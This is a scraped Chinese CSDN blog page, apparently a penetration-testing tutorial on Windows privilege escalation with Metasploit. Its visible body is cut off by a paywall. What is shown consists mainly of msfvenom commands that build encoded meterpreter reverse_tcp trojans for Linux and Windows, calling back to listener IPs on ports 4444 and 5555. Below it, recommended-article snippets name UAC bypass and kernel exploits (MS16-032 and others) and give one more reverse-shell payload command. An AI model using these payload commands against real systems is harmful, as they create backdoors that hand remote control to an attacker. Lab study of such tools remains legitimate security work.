msf下Windows提权

最新推荐文章于 2024-08-28 15:48:22 发布
最新推荐文章于 2024-08-28 15:48:22 发布
阅读量272 收藏 1
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wjq18827615690/article/details/114970138
版权
本文介绍了如何使用Metasploit框架生成payload获取低权限的session,并讲解了针对Windows系统的提权方法,包括利用ask模块进行权限提升和UAC绕过技巧。
摘要由CSDN通过智能技术生成
  • 利用msf生成payload获取目标机session

 

  1. 利用msf生成payload(可以获得一个低权限的session)

生成linux木马

msfvenom -a x64 --platform linux -p linux/x64/meterpreter/reverse_tcp  LHOST=192.168.42.49 LPORT=5555 -i 3 -f elf -o test

msfvenom -a x86 --platform linux -p linux/x64/meterpreter/reverse_tcp  LHOST=192.168.42.49 LPORT=5555 -i 3 -f elf -o test

生成windows木马                   

msfvenom -a x64 --platform windows -p windows/x64/meterpreter/reverse_tcp  LHOST=192.168.42.49 LPORT=4444 -i 3 -f exe -o payload_test.exe

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.0.160 LPORT=4444 -b "\x00" -e x86ikata_ga_nai -f exe > ua

最低0.47元/天 解锁文章
马冬梅007
关注
Windows提权---MSF/令牌窃取/系统服务权限配置错误提权
qq_40012781的博客
07-02 2347
提权是指把普通用户的权限进行提升至高权限的过程,也叫特权提升
使用MSF进行提权windows提权、linux提权、wesng使用
喜欢Python编程的程序员柚柚呀
02-29 1240
安全焦点,其BugTraq是一个出色的漏洞和exploit数据源,可以通过CVE编号,或者产品信息漏洞直接搜索。将刚才生成的 s.exe 文件上传到服务器(靶机)C:\RECYCLER\s.exe 目录(因为一般C:\RECYCLER\ 目录都有读写权限)选定需要使用的攻击模块之后,你只需要使用简单的命令配置一些参数就能完成针对一个漏洞的测试和利用,将渗透的过程自动化、简单化。如果攻击者对可能导致远程代码执行的漏洞和/或仅具有可用漏洞利用代码的漏洞感兴趣,这将非常有用。为此,可以分别使用​。
使用MSF进行提权windows提权、linux提权、wesng使用)
热门推荐
Love&Share
11-22 2万+
文章目录MSF Windows提权反弹shell提权END推荐阅读MSF Linux提权反弹shell补充wesng用法 Metasploit 是一个渗透框架,kali 内安装了,安装位置如下 /usr/share/metasploit-framework 选定需要使用的攻击模块之后,你只需要使用简单的命令配置一些参数就能完成针对一个漏洞的测试和利用,将渗透的过程自动化、简单化 主要作用:漏洞验证、漏洞利用、内网渗透等 MSF Windows提权 靶机: Win server2003 + iis(已.
msf windows提权方法总结
qq_45951598的博客
06-18 2906
简介 提权可分为纵向提权与横向提权:纵向提权:低权限角色获得高权限角色的权限;横向提权:获取同级别角色的权限。 Windows常用的提权方法有:系统内核溢出漏洞提权、数据库提权、错误的系统配置提权、组策略首选项提权、WEB中间件漏洞提权、DLL劫持提权、滥用高危权限令牌提权、第三方软件/服务提权等 1.getsystem 这里使用getsystem命令试一下,运气好的话可能就提到了system 2.bypassuac 内置多个pypassuac脚本,原理有所不同,使用方法类似,运行后返回一个新的会话,需要
MSF进行提权
aozhuo4755的博客
08-14 1473
在WEB渗透中当我们拿到webshell了,我们可以试试用MSF(metasploit)来进行提权,在MSF里meterpreter很强大的! 我们先用msfvenom生成一个EXE的木马后门。 msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b '\x00' LHOST=192.16...
MSF进行windows提权
m0_51822230的博客
05-25 716
主要思路 1.拿到webshell 2.上传大马 3.利用meterpreter模块生成payload 4.本地进行监听 5.进行提权 6.进行维权 7.生成新用户,连接3389 一、本地监听端口 ①.生成payload msfvenom -p windows/meterpreter/reverse_tcp lhost= x.x.x.x lport=xxx -f exe >xxxx/123.exe ②.上传123.exe 这里直接在大马上进行上传运行即可。(随便找一个有执行权限的目录即可) ③.m
利用MSF溢出漏洞提权windows server2012
qq_53409748的博客
03-29 1370
使用Kali Linux平台的“metasploit framework”工具,针对Windows2012R2操作系统,上传EXP实现系统提权
msf内网提权
dreamthe的博客
11-22 2379
目录 1.利用木马文件拿到shell 2.利用ms_2018_8120提权 3.提高程序运行级别。 4.基于ms16_016提权 5.基于ms14_058提权 ​6.基于ms13_053提权 7.uac绕过 8.基于ms16_032提权 1.利用木马文件拿到shell 这里呢我们就不多说了,在上一篇文章里面我进行详细说明和演示。如果有不懂的朋友可以看上一篇的文章,上一篇文章:利用msfvenom生成木马文件反弹shell、meterpreter 简单系统命令_dreamthe的...
利用Metasploit进行Linux提权
01-09
Metasploit 拥有msfpayload 和msfencode 这两个工具,这两个工具不但可以生成exe 型后门,一可以生成网页脚本类型的webshell ,通过生成webshell 然后设置监听器,访问webshell的url...  msfpayload windows/meterpret
windows系统权限提升
weixin_53639243的博客
04-23 2933
提权方法。
MSF渗透测试之msfvenom提权
lza20001103的博客
04-04 984
MSF渗透测试之msfvenom提权
Windows溢出提权 [msf全自动提权练习]
weixin_65722679的博客
07-21 507
Windows溢出提权 [msf全自动提权练习]
【权限提升-Windows提权】-UAC提权MSF模块和UACME项目-DLL劫持-不带引号服务路径-不安全的服务权限
xiaoheizi的博客
09-01 2296
1、具体有哪些权限需要我们了解掌握的?后台权限,网站权限,数据库权限,接口权限,系统权限,域控权限等2、以上常见权限获取方法简要归类说明?后台权限:SQL注入数据库备份泄露,默认或弱口令等获取帐号密码进入网站权限:后台提升至网站权限,RCE或文件操作类、反序列化等漏洞直达Shell数据库权限:SQL注入数据库备份泄露,默认或弱口令等进入或网站权限获取后转入接口权限:SQL注入数据库备份泄露,源码泄漏,培植不当等或网站权限获取后转入。
windows提权
qq_38675102的博客
12-31 2297
windwos提权自学笔记-保持更新
WEB渗透Win提权篇-MSF提权
最新发布
qq_59468567的博客
08-28 225
发现补丁 >use post/windows/gather/enum_patches 列举可用EXP >use post/multi/recon/local_exploit_suggester
msf实战提权windows_推荐一个渗透测试实战平台
weixin_39794130的博客
11-21 340
原创: kid 合天智汇18年毕业,目前某安全公司PM搬砖,但依然钟情于渗透,希望能通过学习不断提高自己的技术。因为一开始研究的是渗透,但还是太菜。大佬师傅当小说看就好。目前实战操作来源vunlhub及handthebox,均须爬楼,我是自己搭的楼梯。Guge和油管以及推特都是很好的平台,油管上太多牛逼的人。。。CTF也会偶尔看,如果有师傅带着玩和打比赛,愿意跟着搬砖打杂。。靶机下载地址:http...
提权 - Windows 令牌窃取/进程注入提权
acepanhuan的博客
03-01 593
提权 - Windows 令牌窃取/进程注入提权
【内网安全】——Windows提权姿势
Demo不是emo的博客
02-06 5412
超详细的windows提权姿势汇总
msf linux 提权
09-12
在Linux中,Metasploit Framework(MSF)是一个功能强大的渗透测试工具,但是提权是一个敏感的话题,需要在合法和合规的情况下进行操作。在渗透测试过程中,提权通常是为了获取更高的权限,并进一步探索和利用目标...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值